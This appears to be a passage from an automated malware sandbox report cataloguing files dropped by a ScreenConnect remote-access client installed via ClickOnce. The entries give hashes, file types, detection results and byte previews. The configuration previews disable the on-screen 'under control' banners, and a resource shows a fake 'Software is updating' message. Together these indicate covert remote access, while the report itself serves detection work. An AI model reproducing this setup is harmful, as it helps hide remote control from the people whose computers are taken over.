                                                                                                                                                                                                                                                      SHA-256:B57F40E1B6057D4E2B58BDB53F8BDD40A89A35DEBC4A08303222DB7BA7E1548C
                                                                                                                                                                                                                                                      SHA-512:FEA00CBB6672B35D087633A2F3881967085839374FC710A47B6FDBAD4239685C5103B59457EDFECC2B0B2935B78C5BA8599ADD2C44AB7479827162C62558416B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PcmH........+.._.c..,...T.......T...............8...........+........<.g..J.|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........U.............6...................z..w.....[~31.X....[s.T..<....s".I...R....y..&..d......B(...........E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......|...........(...............................(................... ...(...4.......\.......d...(...|...................(...............L...........0...............................................l...............................................l...............................................l...............................................l...............................................l...............................................l...nameScreenConnect.Cl
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1632
                                                                                                                                                                                                                                                      Entropy (8bit):5.092740375848212
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onRzgeP0AW+vSkcyMwcbEMwcuMwcVSkcf5bdTo:3FYZ8h9o9gI0AWCHMwTMw3MwGAXTo
                                                                                                                                                                                                                                                      MD5:219DBCD947D7BBDF0BBC78778286B8C7
                                                                                                                                                                                                                                                      SHA1:E95D66F48C130644CE421CBBBFCF3D376FEBAC4E
                                                                                                                                                                                                                                                      SHA-256:C92BB401516771F702CD0986219589CA90E7DE089C8CF4DD825D904985299796
                                                                                                                                                                                                                                                      SHA-512:9E147F80D629AA00C4E0CB8DB708635BA6C14FDE30B8A5574927197352747B43B063060EB4D201C2B4AC984A9F4C84F5F774EB29DE481A0FEE572FB7B0C31F13
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):95520
                                                                                                                                                                                                                                                      Entropy (8bit):6.504144260093153
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Sg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMu7axl:jhbNDxZGXfdHrX7rAc6myJkgoU0HVI
                                                                                                                                                                                                                                                      MD5:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                      SHA1:15886A7D4385D7EC4F7C8837D7218D46E5B3DD9C
                                                                                                                                                                                                                                                      SHA-256:0B2824097ABE3211AAC5FEDA8DC4D300BA51801D9FBED9EB8330B433A66AC001
                                                                                                                                                                                                                                                      SHA-512:B9133EA853AAF6BB2F5EFD7B65A4559701C37D992D8E9CC79BF181CD8CECF0D436077278DDD87725FB5E59BB2962D0FBC111BF0C7E1C760688D01BA4FA4F003E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                      • Filename: xrWUzly94Z.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: EPCo9k8NIn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: X5zNv1VJia.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: AmedVA2n92.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: z7NLXIia8r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: wbxZk3AvuB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: 3ckUhKW8W6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................+.....@.................................p...x....`..P............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):61216
                                                                                                                                                                                                                                                      Entropy (8bit):6.311801757323114
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:EW/+lo6MOc8IoiKWj8Nv8DtyQ4RE+TC6GAhVby97sxd:ELlo6dcclCyQGGn9G
                                                                                                                                                                                                                                                      MD5:C754141304DE3EBAD8ECEEA033356AD6
                                                                                                                                                                                                                                                      SHA1:6AC5D18F1525878FA83E5A93F606AFC58DC7D949
                                                                                                                                                                                                                                                      SHA-256:B1B8A3AD61C1ECED612C442442CC2CF73E2E4B81ACFC8EDFDB3DDEEBAE1E6D78
                                                                                                                                                                                                                                                      SHA-512:81C3B134A2C7C591607ACAC6F9C7881BF0BC194903339534943D65DF49E904BC7FAEEA2A350A4314E28DB2C913C2183C9D3ECF6CA03EB082F5EA461D1E4A6333
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P............"...0.................. ........@.. ....................... .......|....@.....................................O....... ............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):81696
                                                                                                                                                                                                                                                      Entropy (8bit):5.8611828051677515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Atygl44gzbJI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7wk7bOxrk:r+kukLd0kv+k
                                                                                                                                                                                                                                                      MD5:66E3A8246447DECC97AB63A3485B8DE4
                                                                                                                                                                                                                                                      SHA1:2630B84AD3328A1E1CAE11CDF1D7CA2AFC5DB607
                                                                                                                                                                                                                                                      SHA-256:04A113517425FA2544367F4D343FB04AEE582E6CF2E387EAA9A92B7303652973
                                                                                                                                                                                                                                                      SHA-512:363BFBD98B5C49CDF7201AA196D1FEA8EAA905EC531E585FB941B246C881390340AB9CA19996564D32A26CADFC46715C48A15A9E2A08E5760F014E65C9220F11
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):548352
                                                                                                                                                                                                                                                      Entropy (8bit):6.045519732283216
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:YtkHq9BVYKH062PQHz0k4NbuI2Tt1QsEaVQQUzxmj8/lmQpnGGlsGdmACEhHkG5Y:YNpZZasEbJ0OnGGlNkuMHCzzdU
                                                                                                                                                                                                                                                      MD5:D0B5084C680C798B5340D2E61CA5E06C
                                                                                                                                                                                                                                                      SHA1:C4F4DE6B77589A8D853F565C99DEF5DBFB230725
                                                                                                                                                                                                                                                      SHA-256:D933498CD929C57AAB0C3AF908E0FE617213DD67C13E39B2A1D68B8F21849A7A
                                                                                                                                                                                                                                                      SHA-512:E14E32D981F4926FE80A4C45D5DFCDCDC3B78DC63556FFBFB4DCE61C2818E6AA2FD5BACC5734970BDE017AC3FDCF0E24FABCC68C1C99C98A84095394E46391B5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1721856
                                                                                                                                                                                                                                                      Entropy (8bit):6.638253108372186
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24576:qGPFFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:DPFJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                      MD5:F4E602A8A0FD88FF3FFDAC946C21E567
                                                                                                                                                                                                                                                      SHA1:1B9D9F1581F780485A325A35DCD29A16B213591C
                                                                                                                                                                                                                                                      SHA-256:2AB4FB595844C11F27A54402C37197C96FA8E92FCC5D63B43D4810A4891EFBC7
                                                                                                                                                                                                                                                      SHA-512:6DFFC1EF67CC474FC7DCE358A7E3297EBAB4456B88A3A172F0E4BA65C5EE8DD6F67611296DBC8F478B7A3E2ED714E412A26BEF84D19E1B36AD0754BD693CF00B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):600864
                                                                                                                                                                                                                                                      Entropy (8bit):6.181289241696816
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:CQjDnLlwtFNqDJPeQ66ON3nNFcndYYvavXP:Nmt7KLONdFCdYA+P
                                                                                                                                                                                                                                                      MD5:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      SHA1:F288AE509BAE3A0901B727DEBE2CA3153AB77B72
                                                                                                                                                                                                                                                      SHA-256:054260618E077FADCD155C5F37EF3D5745F914ADFE916AE61E8BAFA47F855839
                                                                                                                                                                                                                                                      SHA-512:DC1BF1331B18D0C0E9092A57575A106DFC71CFAE5F9744D6ECACF1F65C3FF8B635737E6F380E7F166DE96E261E79A3C6459DB9D3C8BB524FB7A92DD940847728
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):197120
                                                                                                                                                                                                                                                      Entropy (8bit):6.584712994459805
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:mxGtNaldxI5KY9h12MMusqVFJRJcyzvfquFzDvJXYyB:1tNalc5fr12MbPJY8quFGy
                                                                                                                                                                                                                                                      MD5:4D94014D41DE954AEE952C1B930BA395
                                                                                                                                                                                                                                                      SHA1:35A776D4B569C5367F61A68A577CE92086E682E2
                                                                                                                                                                                                                                                      SHA-256:AD8FC048CE7A61C1AF0428B7B3989163A215A9378417CAC6FBF232D0538405C3
                                                                                                                                                                                                                                                      SHA-512:0ACA355B24FAF86B6C321E88321EFF542F277331745010C3A495AAE6F2F123E518284CB7445F78A83BCE3A61BDFFD1AA3FC082E7DC854218B5D7AF95478414F8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):359
                                                                                                                                                                                                                                                      Entropy (8bit):4.83753806903797
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:8kVXdyrKDLIP12MUAvvR+oHO8fTG6cAtuRTAlrRF4l10+HwercYn:rHy2DLI4MWoHO8L9cAgRMZRCl1FHcY
                                                                                                                                                                                                                                                      MD5:17702A9E63BED7438F3217D594D6E35C
                                                                                                                                                                                                                                                      SHA1:7C556F344A57D5933A528F8B8CFD0363F15AE0E3
                                                                                                                                                                                                                                                      SHA-256:8BFD7D9E0BAC6BDE538DFBE31E8919933547F30248E747C5B38EB84472DF3701
                                                                                                                                                                                                                                                      SHA-512:642BB2D85ECB653DA779AFFAA4285612BC7EB08383967DB16D9F9CA709F6A46280E6E6C7605E850E5AEC28043828826CA6948982591C310374119785784B303B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_%.......&... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.?....=Software is updating... Please do not turn off your computer!..
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):256
                                                                                                                                                                                                                                                      Entropy (8bit):4.878405169379307
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJkw:rHy2DLI4MWoj12eKfKCKB
                                                                                                                                                                                                                                                      MD5:B5450F2285052D7D31714E92BAE6143E
                                                                                                                                                                                                                                                      SHA1:0904C6FE250983A97D5210DFEACCB1C1CF34D643
                                                                                                                                                                                                                                                      SHA-256:23054E289EB585EB0314C44FD753ED3803C012E06B954926F3FC7167A370F928
                                                                                                                                                                                                                                                      SHA-512:79DA469F0C4ACB50D9B399086ED171C69E00C4CF5CB8A2089FD49F5864C1BF46E8434FB23CD210ABB83B88FF06E435A92C8E926B435BFB03EA207D5D7069723E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):50133
                                                                                                                                                                                                                                                      Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                                      MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                                      SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                                      SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                                      SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):26722
                                                                                                                                                                                                                                                      Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                                      MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                                      SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                                      SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                                      SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2089
                                                                                                                                                                                                                                                      Entropy (8bit):4.688974504275539
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHK:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHY
                                                                                                                                                                                                                                                      MD5:6E88FAD97F4CFC0339D8D71F55326EDF
                                                                                                                                                                                                                                                      SHA1:7FE09E6D87B7CA210C8D7AFA9D69380528A6D4F2
                                                                                                                                                                                                                                                      SHA-256:F09E170444003576AD24985C8B4873E7CBDC18863A4943A1FDEB0E3249812806
                                                                                                                                                                                                                                                      SHA-512:023175F24C652E73946A01DB84579BAF00D4447AFA01CD2EA09820964DCA10D9C24C7DD7F37109A836996477B4C9804B75830C95A790B5598564395272F98A15
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):562
                                                                                                                                                                                                                                                      Entropy (8bit):5.071856827733907
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOKTQCDOt/vXbAa3xT:2dL9hK6E46YPoXovH
